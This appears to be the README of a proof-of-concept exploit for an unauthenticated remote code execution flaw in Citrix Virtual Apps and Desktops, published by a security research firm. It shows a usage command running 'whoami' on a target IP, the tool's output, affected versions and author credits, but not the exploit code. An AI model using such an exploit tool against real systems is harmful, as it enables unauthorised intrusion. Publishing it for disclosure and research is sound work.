CVE-2024-xxxx

Citrix Virtual Apps and Desktops (XEN) Unauthenticated Remote Code execution

See our blog post for technical details

citrix-xen-exploit-demo.mp4

PoC in Action

python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-xxxx-xxxxx.py
        (*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr

          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)

        CVEs: [CVE-xxxx-xxxxx]

[INFO] Command sent to 192.168.1.120 successfully!

Affected Versions

Any version from Citrix Virtual Apps and Desktops 7 2402 LTSR and before are vulnerable, more details at citrix advisory

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

• https://labs.watchtowr.com/
• https://x.com/watchtowrcyber